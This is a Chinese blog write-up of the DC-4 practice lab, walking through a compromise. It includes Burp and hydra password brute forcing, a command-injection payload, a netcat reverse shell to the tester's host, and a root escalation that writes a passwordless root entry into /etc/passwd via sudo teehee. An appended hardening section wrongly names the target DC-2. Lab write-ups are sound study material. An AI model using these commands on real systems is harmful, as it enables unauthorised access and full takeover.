【DC-4靶场渗透】


前言

DC靶场很适合拿来做渗透测试,让我们慢慢熟悉渗透测试基本流程,特别是熟练反弹shell,提权等技术,非常不错。

一、DC-4靶场

靶场搭建在本地
IP地址:192.168.0.151
可正常访问
nmap扫描开放的端口发现22ssh和80http服务端口开启

nmap -sT -p- --min-rate 2000 192.168.0.151

dirb查看有无隐藏目录

dirb http://192.168.0.151 /usr/share/wordlists/dirb/big.txt  -X .php,.txt


没有特别发现


二、暴力破解

观察页面是一个登录界面,可尝试暴力破解用户名和密码
常用破解字典下载链接:https://weakpass.com/
bp抓包设置字典爆破

此处因为我已知用户名为admin,所以第一个playload直接设置为admin,即使不知道,设置两个变量爆破也可以解出,只是比较费时间而已。

可得出密码为happy,用户名admin


成功登录

三、查找可利用漏洞

登陆后继续bp抓包

很容易发现radio处就是一个命令执行,命令与参数之间用+号连接
更改一下命令查看效果

cat /etc/passwd


即可发现命令执行漏洞


四、反弹shell

在radio处更改命令

nc+192.168.0.107+8001+-e+/bin/bash

查看kali监听端口

shell反弹成功


五、提权

尝试sudo提权,查看/etc/passwd文件,suid位提权方式等都不行
suid提权一般的查询语句有

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

提示权限不够
查看一下home目录呢

home目录中有三个用户charles,jim,sam
再进入到三个用户目录里查找信息,发现/home/jim目录中存在着密码的备份文件old-passwords.bak,并且22号端口是开启的,那么我们可以尝试使用暴力破解远程登录。进而拿到一个root创建的用户,进而继续尝试后续提权操作。

将里面的内容复制到kali并创建passwd.txt,user.txt中写入三个用户名jim,sam,charles


再进行暴力破解

hydra -L user.txt -P passwd.txt ssh://192.168.0.151

得到用户名为jim,密码jibri104

然后使用ssh远程登录

当前为普通用户,再进行提权
上面提示有mail
查看一下/var/mail,发现是charles发的并且还有他的密码

登陆一下试试

登录成功
再试试sudo提权

发现了/usr/bin/teehee,但是在sudo提权网站上没有提权命令
查看teehee --help文档,大致知晓其作用是:将标准输入复制到每个FILE,也复制到标准输出。
所以可以尝试添加一个root权限的用户,使用标准输出修改/etc/passwd中的该用户信息,使得其无密码即可登录:


仿照root来写

echo "hp::0:0:root:/root:/bin/bash" | sudo teehee -a /etc/passwd 


写入成功,登录便可以看到已经是root权限了


总结

DC-4的渗透考验我们的地方非常多,特别是对信息的收集,敏感文件的查看,思路一定要打开。

在进行Linux DC-2靶场渗透测试后,为了确保系统的安全性,需要对发现的漏洞进行修复。以下是一些常见的漏洞修复建议: 1. **更新系统和软件包**: - 定期更新操作系统和所有安装的软件包,以修补已知的安全漏洞。 - 使用包管理工具(如`apt`或`yum`)进行更新: ```bash sudo apt update && sudo apt upgrade -y ``` 2. **禁用不必要的服务**: - 关闭系统中不必要的服务和端口,减少攻击面。 - 使用`systemctl`命令管理服务: ```bash sudo systemctl disable <service_name> sudo systemctl stop <service_name> ``` 3. **配置防火墙**: - 设置防火墙规则,只允许必要的流量通过。 - 使用`ufw`或`iptables`配置防火墙: ```bash sudo ufw allow <port>/<protocol> sudo ufw enable ``` 4. **强化SSH配置**: - 禁用root用户远程登录。 - 更改默认SSH端口。 - 使用密钥认证而不是密码认证。 - 编辑`/etc/ssh/sshd_config`文件: ```bash PermitRootLogin no Port <new_port> PasswordAuthentication no ``` 5. **设置强密码策略**: - 强制用户设置复杂密码,并定期更换。 - 使用`pam_cracklib`或`pam_pwquality`模块配置密码策略: ```bash sudo apt install libpam-pwquality sudo vi /etc/pam.d/common-password ``` 6. **安装和配置入侵检测系统(IDS)**: - 安装如`Fail2Ban`或`Snort`等工具,监控和阻止可疑活动。 - 配置`Fail2Ban`防止暴力破解: ```bash sudo apt install fail2ban sudo vi /etc/fail2ban/jail.local ``` 7. **日志监控和分析**: - 定期检查系统日志,监控异常活动。 - 使用工具如`Logwatch`或`Splunk`进行日志分析: ```bash sudo apt install logwatch sudo vi /etc/logwatch/conf/logwatch.conf ``` 8. **文件权限和所有权**: - 确保文件和目录的权限和所有权设置正确,防止未授权访问。 - 使用`chmod`和`chown`命令修改权限和所有权: ```bash sudo chmod 644 <file> sudo chown <user>:<group> <file> ``` 9. **数据备份和恢复**: - 定期备份重要数据,并测试恢复过程。 - 使用工具如`rsync`或`tar`进行备份: ```bash sudo rsync -av --delete /data /backup ``` 通过以上措施,可以有效降低Linux DC-2靶场渗透测试中暴露的风险,确保系统的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值